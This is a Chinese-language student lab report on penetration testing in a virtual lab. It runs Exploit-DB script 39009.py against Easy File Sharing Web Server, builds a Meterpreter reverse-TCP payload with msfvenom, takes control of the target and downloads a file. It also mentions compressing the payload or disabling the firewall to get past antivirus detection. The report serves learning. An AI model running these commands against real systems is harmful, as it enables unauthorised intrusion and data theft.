漏洞滲透的簡單測試


一、漏洞滲透測試

1、靶機安裝easy file sharing server(efssetup_2018.zip)

2、利用Nmap掃描發現靶機(Windows)運行了該服務。P99-100

3、利用該漏洞,使得靶機運行計算器。P116-119

具體實現過程:

  1. 使用namp掃描目標計算機:

查看目標計算機的相關信息

image-20200517210304026

  1. 查找EasyFileSharing的有關漏洞:

image-20200517210314710

  1. 查看腳本代碼:

​ 截圖

image-20200517210328997

image-20200517210334772

image-20200517210340764

  1. 執行該腳本:

​ 使用命令:python /usr/share/exploitdb/exploits/windows/remote/39009.py 目標IP

image-20200517210353325

  1. 執行結果:

​ Easy File Sharing Web Server服務崩潰,運行計算機

image-20200517210407180

二、Metasploit應用

1、生成主控端、被控端。

2、獲得靶機(Windows)控制權。

3、下載靶機上任意一個文件。

P121-123;140-145

具體過程:

  1. 生成一個被控端

命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=目標IP lport=5000 -f exe -o /root/payload.exe

image-20200517210419874

生成的文件:

image-20200517210428436

  1. 生成主控端后,在目標計算機運行被控端,獲得目標計算機的控制權,如圖所示:

image-20200517210441798

  1. 對目標計算機的控制操作

查看目標計算機的文件信息,並下載文件hxy.txt文件

Ls //查看

Download 文件名 //下載文件

image-20200517210452167

image-20200517210500262

總結:經過對多台不同的虛擬機的測試嘗試,初步掌握了漏洞測試的基本操作,以及加深了對漏洞滲透測試的理解。遇到的問題:生成的被控端payload會被系統辨別為木馬,需要將被控端進行壓縮或者關閉防火牆,才能將被控端發送到靶機上。嘗試過在物理機上運行Easy File Sharing Web Server服務,然后在Kali上運行相應的py腳本,kali上顯示運行成功,但是計算機上沒有任何反應,猜想是防火牆阻止了該腳本的運行。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM